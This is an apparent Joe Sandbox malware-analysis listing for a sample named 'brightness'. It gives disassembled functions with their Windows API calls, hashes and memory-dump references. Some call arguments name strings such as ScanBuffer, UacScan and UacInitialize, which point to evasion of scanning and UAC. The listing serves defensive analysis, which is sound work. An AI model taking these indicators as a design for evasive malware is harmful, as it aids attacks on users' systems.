                                                                                                                                                                          • RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,0291EBA3), ref: 0291EB7B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                          • Opcode ID: 34d3fe8a15374b5e3e0373d16875fb1b297ad8d96aed0afa876999345fe8af85
                                                                                                                                                                          • Instruction ID: 3dd0a5a2530e14ffe6efda6464855b5f97d029f89791a44bb8fd045f5d4e05c4
                                                                                                                                                                          • Opcode Fuzzy Hash: 34d3fe8a15374b5e3e0373d16875fb1b297ad8d96aed0afa876999345fe8af85
                                                                                                                                                                          • Instruction Fuzzy Hash: 09110071A40208AFEB00EBA9DCC1D6E77EDEB89B10F900574B905D7290DB30DE519E60
                                                                                                                                                                          Function 0291EAF4 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02A56914), ref: 0291EB38
                                                                                                                                                                          • RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,0291EBA3), ref: 0291EB70
                                                                                                                                                                          • RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,0291EBA3), ref: 0291EB7B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                          • Opcode ID: 107de584be8298f20696a4795bfaf4a8bdb8fb38b79581eab943760ced89793a
                                                                                                                                                                          • Instruction ID: 39bcc3a11f86d2999657ac3a9cdc519f195c328163f8581469aa88ec64f5c31e
                                                                                                                                                                          • Opcode Fuzzy Hash: 107de584be8298f20696a4795bfaf4a8bdb8fb38b79581eab943760ced89793a
                                                                                                                                                                          • Instruction Fuzzy Hash: A2110071A40208AFDB00EBA5DCC1D6E77EDEB89B10F900574B505D7290DB30DA519E60
                                                                                                                                                                          Function 0290E2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                                          • Opcode ID: 82e3558b8079410e70c8f5aebe8fd769fe37cc2779b355b3248167739cd4bd10
                                                                                                                                                                          • Instruction ID: b0f12b5b0f945d60c4762c02b78ff8019d22b2bce9b06b72b14637e493f9d567
                                                                                                                                                                          • Opcode Fuzzy Hash: 82e3558b8079410e70c8f5aebe8fd769fe37cc2779b355b3248167739cd4bd10
                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF06D62B0821CDFDB247B3989C466A7B9A9F84B107545C76E48A9B2C5CB248C09CB62
                                                                                                                                                                          Function 02904CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysFreeString.OLEAUT32(0291ED84), ref: 02904C1A
                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 02904D07
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02904D19
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Free$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 986138563-0
                                                                                                                                                                          • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                                                                          • Instruction ID: 8b67a57fbc6c7ec48a5d40111e49c217558c954690177aba91b04e6ff6698f20
                                                                                                                                                                          • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                                                                          • Instruction Fuzzy Hash: D0E012B81052095EFB142F259DC0B3B372EAFC5B41B145899BA04CA1D0D734C841AD34
                                                                                                                                                                          Function 0291705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0291735A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                          • String ID: H
                                                                                                                                                                          • API String ID: 3341692771-2852464175
                                                                                                                                                                          • Opcode ID: 0365c794c70df76bbb00f99ca3c830eded84efd1ad6435abf03f45c07beaf3dc
                                                                                                                                                                          • Instruction ID: a3f1456f017618556af209ee85e2fe294f47ad53db0c0b78527503394eca6bc0
                                                                                                                                                                          • Opcode Fuzzy Hash: 0365c794c70df76bbb00f99ca3c830eded84efd1ad6435abf03f45c07beaf3dc
                                                                                                                                                                          • Instruction Fuzzy Hash: CBB1D174A01609EFDB14CF9AE580A9DFBF6FF89314F248569E805AB364D730A846CF50
                                                                                                                                                                          Function 0290E6E0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 0290E701
                                                                                                                                                                            • Part of subcall function 0290E2E4: VariantClear.OLEAUT32(?), ref: 0290E2F3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearCopy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 274517740-0
                                                                                                                                                                          • Opcode ID: 5e3b115fa01f953385c03d0c8794f07cf48e7df91ace0ad61fa425945c6b844f
                                                                                                                                                                          • Instruction ID: 73af3a8fd009edae0ea3d78a9a5ec99465ddb28119de42e184dc814a89f9c77f
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e3b115fa01f953385c03d0c8794f07cf48e7df91ace0ad61fa425945c6b844f
                                                                                                                                                                          • Instruction Fuzzy Hash: 8A11A92170421C9FCB34AF69D9C4A6B77DBEF857507045C26E6CA8B2C5DB30EC40C661
                                                                                                                                                                          Function 0290E37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1927566239-0
                                                                                                                                                                          • Opcode ID: 8c922e6f859ddca18fb61c8354f1c00d893a5ca7acea21f5a65a890989455e5e
                                                                                                                                                                          • Instruction ID: 3df708ecd6eaef89bf6753d25b50e35cf3b53a4acadfa8066d61a6655d64541d
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c922e6f859ddca18fb61c8354f1c00d893a5ca7acea21f5a65a890989455e5e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C314D72A0421CAFDB14DFA8C8C4AAA7BEDEB4C304F444D66F989D3280D330D990CB65
                                                                                                                                                                          Function 02916CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CLSIDFromProgID.OLE32(00000000,?,00000000,02916D39,?,?,?,00000000), ref: 02916D19
                                                                                                                                                                            • Part of subcall function 02904C0C: SysFreeString.OLEAUT32(0291ED84), ref: 02904C1A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeFromProgString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4225568880-0
                                                                                                                                                                          • Opcode ID: ebb9d4239e6fe4bdaa5f2f8d4079ef8e0feb3a0273d64978b6b13534e2e969a6
                                                                                                                                                                          • Instruction ID: 069cf607e512eaed28de4d427ff67a6fafb6c343cb10535913063063e4915d36
                                                                                                                                                                          • Opcode Fuzzy Hash: ebb9d4239e6fe4bdaa5f2f8d4079ef8e0feb3a0273d64978b6b13534e2e969a6
                                                                                                                                                                          • Instruction Fuzzy Hash: 7FE06D75A1430CBFE711EBA6CC9299A77EDDFC9B10B510475AA00D7680EA75AE0098A0
                                                                                                                                                                          Function 02905814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 02905832
                                                                                                                                                                            • Part of subcall function 02905A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02900000,0292E790), ref: 02905A94
                                                                                                                                                                            • Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02900000,0292E790), ref: 02905AB2
                                                                                                                                                                            • Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02900000,0292E790), ref: 02905AD0
                                                                                                                                                                            • Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02905AEE
                                                                                                                                                                            • Part of subcall function 02905A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
                                                                                                                                                                            • Part of subcall function 02905A78: RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02905B7D,?,80000001), ref: 02905B55
                                                                                                                                                                            • Part of subcall function 02905A78: RegCloseKey.ADVAPI32(?,02905B84,00000000,?,?,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2796650324-0
                                                                                                                                                                          • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                                                          • Instruction ID: 16f02471ba9fe13a574cc3a7b80487851a15153edd7f3eeb9609745ce476e814
                                                                                                                                                                          • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                                                          • Instruction Fuzzy Hash: 05E06571A002188FCB14DE6888C0A8637D8BF08750F8109A5ED58DF38AD3B0DD608FE0
                                                                                                                                                                          Function 02907D94 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02907DA8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                          • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                          • Instruction ID: 4ae72cdab9bcfa890421bd777e2a9293fec0affda4b9cfee815ecf3bd177ccff
                                                                                                                                                                          • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                          • Instruction Fuzzy Hash: 0ED05B723081147ED220965E5C84EFB5BDDCFC9770F100639B658C71C0D7208C0187B1
                                                                                                                                                                          Function 02907E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,0291FD00,ScanString,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanString,0296237C,0292B40C,UacScan,0296237C,0292B40C,UacInitialize), ref: 02907E1B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                                                                                                                          • Instruction ID: 3c6508b771dfaca7c54e83996955b48c1e1138c8fd14e8feab3ba6c58c28d005
                                                                                                                                                                          • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                                                                                                                          • Instruction Fuzzy Hash: E5C08CE070330A0E1A50A2FC0CC44AA428C09841383A42F31E238DA2F2D321A8232420
                                                                                                                                                                          Function 02907E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02922E7D,ScanString,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,Initialize), ref: 02907E3F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          • Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                                                                                                                          • Instruction ID: e0fca10a08014a1aab0d0bbabde46556ee55892d5a5ac42fff4a9c7c8c1d76de
                                                                                                                                                                          • Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                                                                                                                          • Instruction Fuzzy Hash: 94C08CA070330C0E1E50A2FC4CC4A8E428C0D841383A02F31E23CC61E2D321E8622410
                                                                                                                                                                          Function 02904C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                          • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                                                                          • Instruction ID: 06ca935c9b844225799f0f4b174ebf980334b3db410e16338633fc971058759f
                                                                                                                                                                          • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                                                                          • Instruction Fuzzy Hash: 3EC012A26002384FEB215A989CC079562CCDB49395B1410A1E508D7280E3609C005A64
                                                                                                                                                                          Function 02904C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysFreeString.OLEAUT32(0291ED84), ref: 02904C1A
                                                                                                                                                                          • SysReAllocStringLen.OLEAUT32(0292C2B4,0291ED84,000000B4), ref: 02904C62
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 344208780-0
                                                                                                                                                                          • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                                                                                                                          • Instruction ID: 19e388a039d381325cb964a52f194256603213a95499c383c13743a166ee1d0d
                                                                                                                                                                          • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                                                                                                                          • Instruction Fuzzy Hash: D2D0807450011D5DAF2C9A5949C4977776E9FD030634CE75DDB028E2C0F731C800CA31
                                                                                                                                                                          Function 0292BF84 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • timeSetEvent.WINMM(00002710,00000000,0292BF78,00000000,00000001), ref: 0292BF94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmpDownload File
